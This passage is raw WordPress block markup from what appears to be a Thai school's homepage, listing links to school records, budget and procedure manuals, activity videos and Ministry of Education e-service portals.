kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table 